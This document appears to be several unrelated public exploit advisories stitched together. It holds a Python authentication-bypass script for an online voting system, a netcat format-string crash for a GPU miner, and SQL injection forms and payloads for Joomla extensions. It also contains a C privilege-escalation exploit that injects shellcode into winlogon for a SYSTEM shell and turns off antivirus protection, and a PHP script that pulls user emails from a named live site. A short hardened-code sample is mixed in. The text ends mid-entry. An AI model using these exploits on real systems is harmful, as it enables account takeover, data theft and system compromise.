# Exploit Title: Online Voting System - Authentication Bypass
# Date: 02.02.2018
# Vendor Homepage: http://themashabrand.com
# Software Link: http://themashabrand.com/p/votin
# Demo: http://localhost/Onlinevoting
# Version: 1.0
# Category: Webapps
# Exploit Author: Giulio Comi
# CVE : CVE-2018-6180
# Description
A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for any account registered in the application.
The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier, without requiring the current valid password for the target account.
# Proof of Concept:
#!/usr/bin/env python
import requests
from time import sleep
from lxml import html


def own(auth_bypass_request):
    """
    Reset the password of a user just knowing his id
    """
    url_edit_password = "admin/profile.php"
    payload = {
        'id': 1,
        'admin': 'admin',                   # overwrite the username of the victim
        'password': "ARBITRARY_PASSWORD",   # overwrite the password of the victim
        'edit': ''
    }
    response = auth_bypass_request.post(target_site + url_edit_password, data=payload)
    # Parse the response body to check if the request was successful
    check_result = html.fromstring(response.content).xpath('//div[@class="alert alert-success"]//p//strong/text()')
    return 'Successfully' in str(check_result)


def login(login_request):
    """
    Enjoy the new password chosen for the victim
    """
    credentials = {'username': 'admin',
                   'password': "ARBITRARY_PASSWORD",
                   'usertype': 'admin',
                   'login': ''
                   }
    response = login_request.post(target_site, data=credentials)
    print(response.text)


if __name__ == "__main__":
    target_site = "http://localhost/Onlinevoting/"
    request = requests.Session()
    if own(request):
        sleep(4)  # just a bit of delay
        login(request)
    else:
        print('Maybe the given id is not registered in the application')
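The two conditions the advisory names (no session validation, account chosen by a client-supplied incremental id, no current-password check) modelled as a vulnerable and a hardened profile-update handler. This is an added example, not code from the advisory or the Online Voting System; the in-memory USERS and SESSIONS stores, the handler names and the PBKDF2 storage format are assumptions.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random per-user salt; returns 'salthex$digesthex'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Constant-time comparison of a candidate password against the stored hash."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


# Constructed sample state (assumption): one account with incremental id 1 and one live session.
USERS = {1: {"username": "admin", "password": hash_password("original-secret")}}
SESSIONS = {"valid-cookie": 1}


def update_profile_vulnerable(cookie, form):
    """Models the flaw: the session cookie is never validated and the target
    account is whatever incremental 'id' the client submits."""
    user = USERS.get(int(form["id"]))
    if user is None:
        return False
    user["username"] = form["admin"]
    user["password"] = hash_password(form["password"])
    return True


def update_profile_hardened(cookie, form):
    """The account comes from a validated session, never from the form, and the
    current password must be proven before anything is overwritten."""
    user_id = SESSIONS.get(cookie)
    if user_id is None:
        return False                      # unauthenticated request
    user = USERS[user_id]                 # any client-supplied 'id' is ignored
    if not verify_password(form.get("current_password", ""), user["password"]):
        return False                      # current password not proven
    user["username"] = form["admin"]
    user["password"] = hash_password(form["password"])
    return True
```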
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service.
After reading about the recent vulnerabilities in previous versions, I thought I should take another look at the JSON listener on port 3333 and see whether there were any avenues of attack.
echo -e '{"id":1,"jsonrpc":"1.0","method":"test"}' | nc 192.168.1.107 3333 & printf "\n"
After realizing the buffer was printed back, I decided to try a few other format specifiers…
Sending %s does return some strings; however, I couldn't get the hex addresses padded properly to dig in further, as I kept getting "unable to parse json" errors. Sending %p also yielded some results, but I'm sure someone more qualified could exploit the stack further…
Finally, sending %n completely kills the mining process.
echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"
Keep your rigs up to date, or stop opening port 3333 to the public. Seriously.
Timeline
01/26/18 — Reported
01/26/18 — Confirmed and immediately patched. 10.6 released; request for a 3–4 day embargo
01/31/18 — Public Disclosure
<!--
# # # # #
# Exploit Title: Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-googlemap/
# Software Download: http://zhuk.cc/files/pkg_zhgooglemap-j30-8.4.0.0-final.zip
# Version: 8.4.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6582
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<html>
<body>
<!--com_zhgooglemap/controller.php-->
<!--# 1)-->
<!--L 30: public function getPlacemarkDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
<input type="submit" value="1-Ver Ayari">
</form>
<!--# 2)-->
<!--L 363: public function getPlacemarkHoverText() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">
<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22--" type="hidden">
<input type="submit" value="2-Ver Ayari">
</form>
<!--# 3)-->
<!--L 418: public function getPathHoverText() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathHoverText" method="post">
<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e336f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">
<input type="submit" value="3-Ver Ayari">
</form>
<!--# 4)-->
<!--L 763: public function getPathDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathDetails" method="post">
<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">
<input type="submit" value="4-Ver Ayari">
</form>
</body>
</html>
<!--
# # # # #
# Exploit Title: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-baidumap/
# Software Download: http://zhuk.cc/files/pkg_zhbaidumap-j30-3.0.0.1-final.zip
# Version: 3.0.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6605
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<html>
<body>
<!--com_zhbaidumap/controller.php-->
<!--# 1)-->
<!--L 27: public function getPlacemarkDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
<input type="submit" value="1-Ver Ayari">
</form>
<!--# 2)-->
<!--L 356: public function getPlacemarkHoverText() {........}-->
<form action="http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">
<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22--" type="hidden">
<input type="submit" value="2-Ver Ayari">
</form>
<!--# 3)-->
<!--L 411: public function getPathHoverText() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText" method="post">
<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">
<input type="submit" value="3-Ver Ayari">
</form>
<!--# 4)-->
<!--L 756: public function getPathDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails" method="post">
<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">
<input type="submit" value="4-Ver Ayari">
</form>
</body>
</html>
<!--
# # # # #
# Exploit Title: Joomla! Component Zh YandexMap 6.2.1.0 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
# Software Download: http://zhuk.cc/files/pkg_zhyandexmap-j30-6.2.1.0-final.zip
# Version: 6.2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6604
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<html>
<body>
<!--com_zhyandexmap/controller.php-->
<!--# 1)-->
<!--L 29: public function getPlacemarkDetails() {........}-->
<form action="http://localhost/[PATH]/index.php?option=com_zhyandexmap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
<input type="submit" value="1-Ver Ayari">
</form>
</body>
</html>
/*
Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
Date : 02/02/2018
Author : Souhail Hammou
Vendor Homepage : https://www.malwarefox.com/
Version : 2.74.0.150
Tested on : Windows 7 32-bit / Windows 10 64-bit
CVE : CVE-2018-6593
*/
#include <Windows.h>
#include <fltUser.h>
#include <TlHelp32.h>
#include <stdio.h>

#pragma comment(lib,"FltLib.lib")

BOOL RegisterProcessByCommunicationPort()
{
    HRESULT hResult;
    HANDLE hPort;

    /*
    Improper access control :
    The default DACL for the filter communication port is superseded allowing everyone to connect to the port:

    .text:0000000140011987 lea     rcx, [rbp+SecurityDescriptor]
    .text:000000014001198B mov     edx, 1F0001h
    .text:0000000140011990 call    FltBuildDefaultSecurityDescriptor ;default SD only allows SYSTEM & Admins to connect
    .text:0000000140011995 test    eax, eax
    [.........]
    .text:00000001400119B1
    .text:00000001400119B1 loc_1400119B1:                          ; CODE XREF: sub_140011890+107j
    .text:00000001400119B1 mov     rcx, [rbp+SecurityDescriptor]   ; SecurityDescriptor
    .text:00000001400119B5 xor     r9d, r9d                        ; DaclDefaulted
    .text:00000001400119B8 xor     r8d, r8d                        ; Dacl
    .text:00000001400119BB mov     dl, 1                           ; DaclPresent
    .text:00000001400119BD call    cs:RtlSetDaclSecurityDescriptor ; <= Vuln: SD's DACL pointer is set to NULL, granting access to everyone

    Once connected to the port, the driver automatically registers the process
    as trusted. This allows the process to issue IOCTL codes that couldn't be sent otherwise.
    e.g. disable real-time protection, write to raw disk, open full access handles to processes ...etc
    */

    hResult = FilterConnectCommunicationPort(
        L"\\GLOBAL??\\ZAM_MiniFilter_CommPort",
        0,
        NULL,
        0,
        NULL,
        &hPort);

    if (hResult != S_OK)
    {
        return FALSE;
    }

    CloseHandle(hPort);
    return TRUE;
}

DWORD GetWinlogonPID()
{
    DWORD WinlogonPid = 0;
    PROCESSENTRY32 ProcessEntry;
    ProcessEntry.dwSize = sizeof(PROCESSENTRY32);

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateToolhelp32Snapshot failed !\n");
        goto ret;
    }

    if (!Process32First(hSnapshot, &ProcessEntry))
    {
        printf("[-] Process32First failed !\n");
        goto cleanup;
    }

    do
    {
        if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
        {
            WinlogonPid = ProcessEntry.th32ProcessID;
            break;
        }
    } while (Process32Next(hSnapshot, &ProcessEntry));

cleanup:
    CloseHandle(hSnapshot);
ret:
    return WinlogonPid;
}

int main(int argc, char** argv)
{
    DWORD BytesReturned;
    DWORD winlogon_pid;
    HANDLE winlogon_handle;
    LPVOID RemoteAllocation;
    HANDLE hDevice;

    printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
    printf(" Tested on Windows 10 64-bit \n");
    printf(" Souhail Hammou \n\n");

    printf("[*] Stage 1: Registering the process with the driver by connecting to the minifilter communication port\n");

    hDevice = CreateFile("\\\\.\\ZemanaAntiMalware",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    if (!RegisterProcessByCommunicationPort())
    {
        printf("\t[-] Registration Failed !\n");
        return 0;
    }

    printf("\t[+] Process registered.\n[*] Stage 2: \n");
    printf("\t[+] Getting Winlogon's PID\n");
    winlogon_pid = GetWinlogonPID();
    if (!winlogon_pid)
    {
        printf("\t[-] GetWinlogonPID() failed !\n");
        return 0;
    }

    printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
    /*
    The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
    We use this IOCTL to open a full access handle to winlogon.exe.
    Note that this IOCTL can only be sent if the process is registered with the driver.
    */
    if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
    {
        printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
        return 0;
    }

    printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
    if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
    {
        printf("\t[-] VirtualAllocEx failed !\n");
        return 0;
    }

    printf("\t[+] Writing shellcode to allocated memory\n");
    /*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
    unsigned char buf[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";

    if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
    {
        printf("\t[-] WriteProcessMemory Failed !\n");
        return 0;
    }

    printf("\t[+] Spawning SYSTEM shell\n");
    if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
    {
        printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
        return 0;
    }

    printf("[*] Bonus:\n\t[+] Disabling real-time protection\n");
    if (!DeviceIoControl(hDevice, 0x80002090, NULL, 0, NULL, 0, &BytesReturned, NULL))
    {
        printf("\t[-] DeviceIoControl 0x80002090 failed !\n");
        return 0;
    }
    printf("\t[+] RT protection disabled.");

    return 0;
}
<?php
# # # # #
# Exploit Title: Joomla! Component jLike 1.0 - Information Leakage
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://joomlaserviceprovider.com/
# Software Link: https://extensions.joomla.org/extensions/extension/social-web/social-share/jlike/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6610
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# Information Leakage
#
# Proof of Concept:
#
# 1)
header('Content-type: text/html; charset=UTF-8');
$url = "http://www.projectcontrolsinstitute.com/";
$p = "index.php?option=com_jlike&task=getUserByCommentId&tmpl=component&format=row";
$url = file_get_contents($url.$p);
$l = json_decode($url, true);
if ($l) {
    echo "*-----------------------------*<br />";
    foreach ($l as $u) {
        echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />";
        echo "[-] Name\n\n:\n" .$u['name']."<br />";
        echo "[-] Email\n:\n" .$u['email']."<br />";
        echo "<br>";
    }
    echo "*-----------------------------*";
} else {
    echo "[-] No user";
}
?>
# # # # #
# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://joomlaserviceprovider.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6609
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
#
# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
#
# Parameter: ticketcode (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 29 columns
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
# 2)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
#
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
#
# 3)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
#
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Parameter: id (GET)
# Type: boolean-based blind
